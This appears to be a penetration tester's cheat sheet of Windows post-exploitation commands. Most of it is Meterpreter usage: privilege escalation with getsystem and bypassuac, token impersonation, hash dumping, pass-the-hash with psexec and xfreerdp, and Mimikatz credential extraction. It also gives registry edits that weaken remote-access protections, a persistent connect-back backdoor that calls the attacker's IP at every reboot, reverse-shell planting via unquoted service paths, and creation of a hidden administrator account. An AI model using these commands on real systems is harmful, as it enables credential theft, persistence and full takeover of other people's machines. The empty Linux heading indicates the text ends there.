Table of Content

• Table of Content
• Windows
• With a Meterpreter Shell
• Incognito (lateral Windows privesc)
• Unquoted Service Paths
• Dumping hashes
• Pass the Hash
• Mimikatz
• Enable RDP
• Connect-back Backdoors
• Without a Meterpreter Shell
• List running processes
• Unquoted Service Paths
• DLL search order
• Connect to RDP using a NTLM Hash
• Create a new user
• Linux

Windows

With a Meterpreter Shell

getsystem

run post/windows/gather/win_privs

bypassuac

Incognito (lateral Windows privesc)

Incognito is an extension built for lateral Windows privesc

use incognito

list_tokens -u

impersonate_token $USER

Unquoted Service Paths

See Privilege Escalation - Unquoted Service Paths

use exploit/windows/local/trusted_service_path

show options

run

Dumping hashes

hashdump

If the command fails, migrate to another process, then rerun the command.

Pass the Hash

This will only work if we use an administrator account

use exploit/windows/smb/psexec

show options

run

If the command fails with Exploit failed [no-access], in powershell, run

Set-ItemProperty -Path HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system -Name LocalAccountTokenFilterPolicy -Value 1 -Type DWord

Set-ItemProperty -Path HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system -Name RequireSecuritySignature -Value 0 -Type DWord

and rerun the exploit.

Mimikatz

Note that Mimikatz works without errors when the meterpreter shell is attached to a 64-bit process.

ps -A x86_64 -s

migrate $PID

load mimikatz

wdigest

Enable RDP

run getgui -e

If the user is not allowed to connect via RDP, run (in a windows shell)

net localgroup "Remote Desktop Users" $USER /add

rdesktop $IP -u $USER -p $PASSWORD

Connect-back Backdoors

This will generate a connect back backdoor (reverse shell but the other way around) that will try to connect to our machine at every reboot.

persistence -A -X -i 5 -p 8080 -r $OUR_IP

To get back the reverse shell, simply start a handler on port 8080

run exploit/multi/handler

Without a Meterpreter Shell

List running processes

net start

Unquoted Service Paths

This vulnerability happens when a service is configured with a path to a binary which is unquoted and contains spaces.

In that case, Windows looks for the binary in this order:

1. C:\Program.exe
2. C:\Program Files (x86)\Author\Program.exe
3. C:\Program Files (x86)\Author\Program\SETEVENT.exe

That way, we can write a reverse shell and name it as C:\Program.exe or as C:\Program Files (x86)\Author\Program.exe. This executable would be launched when the service starts, rather than the original executable.

wmic services get name,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows//" |findstr /i /v """

DLL search order

When a program is launched, the DLL search order is, generally:

1. The directory of the executable
2. C:\Windows\System32
3. C:\windows\system
4. C:\windows
5. The current directory when the executable was launched
6. All directories in the PATH environment variable

Connect to RDP using a NTLM Hash

xfreerdp /u:$USER /d:$DOMAIN /pth:$HASH /v:$IP

Create a new user

net user $USER $PASSWORD /add

net localgroup "Administrators" $USER /add

Linux